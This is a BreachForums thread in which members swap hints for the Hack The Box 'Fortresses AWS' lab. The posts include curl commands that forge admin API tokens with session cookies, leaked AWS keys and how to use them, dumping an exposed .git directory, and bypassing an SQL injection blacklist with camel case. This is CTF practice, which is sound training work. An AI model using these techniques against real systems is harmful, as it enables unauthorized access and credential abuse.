Return to forum
Fortresses_AWS
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 28
Threads: 0
Joined: N/A
Reputation: 1

#51
July 17, 2022 at 2:14 PM
(July 17, 2022, 10:03 AM)just4htb1337 Wrote: Any chance someone could help with how to extract the base64.c00.xyz in "logs.amzcorp.local"? Tried different kind of grep, jq, even notepad++



nvm ... managed to extract them using transpose paste in excel :)

But couldn't find any flag, just the parts of passwd file and cron...


nvm ... got the flag...


Learn python, man...
Reply
BreachForums User
Member
Posts: 0
Threads: 0
Joined: N/A
Reputation: 0

#52
July 17, 2022 at 6:54 PM
Got some trouble running the code on page 1... my output:Perhaps it's patched or I am doing something wrong... any nudge?└─# echo -n '{"get_token":"True","uuid":"955","username":"admin"} ' | base64 | xargs -I {} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiYzBlOTJkMjE5YzJhZDczNmIwYzcyOTM5MDliYjA1MGRkOGQ3MzM4YyJ9.YtRbaQ.HciZXzFO_PNnBvYtPW2TPbtEdm4" -d '{"data":"{}"}' --header "Content-Type: application/json" AWS Console Dashboard - Error 403
404 not found

Access denied

Please contact support or authenticate

CLICK TO RETURN HOME
Reply
Member
Member
Posts: 43
Threads: 0
Joined: N/A
Reputation: 2

#53
July 17, 2022 at 7:26 PM
[quote="h4ckth3b0x" pid="156333" dateline="1658084047"]Got some trouble running the code on page 1... my output:Perhaps it's patched or I am doing something wrong... any nudge?└─# echo -n '{"get_token":"True","uuid":"955","username":"admin"} ' | base64 | xargs -I {} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiYzBlOTJkMjE5YzJhZDczNmIwYzcyOTM5MDliYjA1MGRkOGQ3MzM4YyJ9.YtRbaQ.HciZXzFO_PNnBvYtPW2TPbtEdm4" -d '{"data":"{}"}' --header "Content-Type: application/json" AWS Console Dashboard - Error 403
404 not found

Access denied

Please contact support or authenticate

CLICK TO RETURN HOME
[/quote]Still works.Create an account first then use your cookie...[hr][quote="teksius" pid="155917" dateline="1658067265"][quote="just4htb1337" pid="155591" dateline="1658052220"][s]Any chance someone could help with how to extract the base64.c00.xyz in "logs.amzcorp.local"? Tried different kind of grep, jq, even notepad++[/s]nvm ... managed to extract them using transpose paste in excel :) [s]But couldn't find any flag, just the parts of passwd file and cron...[/s]nvm ... got the flag...[/quote]Learn python, man...[/quote]Yeah man ... still in the learning phase :)
Reply
Member
Member
Posts: 24
Threads: 0
Joined: N/A
Reputation: 1

#54
July 19, 2022 at 11:51 PM
(July 15, 2022, 12:19 PM)mceye Wrote: look logs for Tyler and urlencoded password. Also look for the /.git and dmp it . then see the commits and look for info and vulnerability.


Any help to locate git and dump, only see that:

"hostname": "jobs-development.amzcorp.local",
"ip_address": "172.21.10.11",
"method": "GET",
"requester_ip": "129.141.123.251",
"url": "/.git"
Reply
Banned
Posts: 27
Threads: 0
Joined: N/A
Reputation: 2

#55
July 20, 2022 at 1:59 AM
(July 15, 2022, 04:10 PM)hacker1111 Wrote:
(July 15, 2022, 04:06 PM)fironeDerbert Wrote:
(July 15, 2022, 03:59 PM)hacker1111 Wrote:
(July 15, 2022, 03:46 PM)fironeDerbert Wrote: There is creds in the git: 

ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')


You can use them like this:
apt-get install awscli


aws configure


enter the creds


aws --endpoint-url http://cloud.amzcorp.local ecs help


these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4

and that jwt creating here http://company-support.amzcorp.local

The custom_jwt.py is to get the flag 4 or the flag 3 ?


flag 4

flag 3 is in sql db. dump keys_tbl table

[quote pid="152349" dateline="1657901437"]
Any help, with SQL injection, is it possible to use SQLMAP with some tamper, or do you play manually?
[/quote]
Reply
Member
Member
Posts: 43
Threads: 0
Joined: N/A
Reputation: 2

#56
July 20, 2022 at 5:41 AM
(July 19, 2022, 11:51 PM)Peter Wrote:
(July 15, 2022, 12:19 PM)mceye Wrote: look logs for Tyler and urlencoded password. Also look for the /.git and dmp it . then see the commits and look for info and vulnerability.


Any help to locate git and dump, only see that:

"hostname": "jobs-development.amzcorp.local",
"ip_address": "172.21.10.11",
"method": "GET",
"requester_ip": "129.141.123.251",
"url": "/.git"


Use git-dumper tool from github
Remember to add jobs-development.amzcorp.local to your /etc/hosts file

(July 20, 2022, 01:59 AM)htb_col Wrote:
(July 15, 2022, 04:10 PM)hacker1111 Wrote:
(July 15, 2022, 04:06 PM)fironeDerbert Wrote:
(July 15, 2022, 03:59 PM)hacker1111 Wrote:
(July 15, 2022, 03:46 PM)fironeDerbert Wrote: There is creds in the git: 

ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')


You can use them like this:
apt-get install awscli


aws configure


enter the creds


aws --endpoint-url http://cloud.amzcorp.local ecs help


these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4

and that jwt creating here http://company-support.amzcorp.local

The custom_jwt.py is to get the flag 4 or the flag 3 ?


flag 4

flag 3 is in sql db. dump keys_tbl table

[quote pid="152349" dateline="1657901437"]
Any help, with SQL injection, is it possible to use SQLMAP with some tamper, or do you play manually?


[/quote]
sqlmap doesn't work... manual injection is the path ... there is a blacklist filter... you can simple bypass them using camel case
Reply
Member
Member
Posts: 24
Threads: 0
Joined: N/A
Reputation: 1

#57
July 20, 2022 at 9:58 PM
(July 20, 2022, 05:41 AM)just4htb1337 Wrote:
(July 19, 2022, 11:51 PM)Peter Wrote:
(July 15, 2022, 12:19 PM)mceye Wrote: look logs for Tyler and urlencoded password. Also look for the /.git and dmp it . then see the commits and look for info and vulnerability.


Any help to locate git and dump, only see that:

"hostname": "jobs-development.amzcorp.local",
"ip_address": "172.21.10.11",
"method": "GET",
"requester_ip": "129.141.123.251",
"url": "/.git"


Use git-dumper tool from github
Remember to add jobs-development.amzcorp.local to your /etc/hosts file

/etc/hosts
I didn't even count on it, how many times do I get complicated without reviewing the basics.  Thanks!!!
Reply
Banned
Posts: 83
Threads: 0
Joined: N/A
Reputation: 21

#58
July 23, 2022 at 9:46 AM
anyone figure out how to exploit jwt for flag 4?
Reply
Member
Member
Posts: 24
Threads: 0
Joined: N/A
Reputation: 1

#59
July 26, 2022 at 1:16 AM
Anyone how sqldump
Reply
Advanced User
Advanced
Posts: 70
Threads: 0
Joined: N/A
Reputation: 2

#60
July 26, 2022 at 4:37 PM
curl -s -X POST "http://jobs.amzcorp.local/api/v4/users/edit" --cookie "TYLER_SESSION_COOKIE" -d '{"update_user":"BASE64_MYUSER_JSON_PAYLOAD"}' --header "Content-Type: application/json" --cookie "api_token=API_TOKEN" Internal Server Error

Internal Server Error

Also tried with an invalid user to get "Unable to find user" error but did not work.--curl -s -X POST "http://jobs.amzcorp.local/api/v4/users/edit" --cookie "" --cookie "api_token=API_TOKEN" --header "Content-Type: application/json" -d '{"update_user": ""}'Even this is throwing an Internal Server Error.Do you think something is broken?Can somebody click on Reset?----UPDATE: No problem after reset.
Reply


 Users viewing this thread: Fortresses_AWS: No users currently viewing.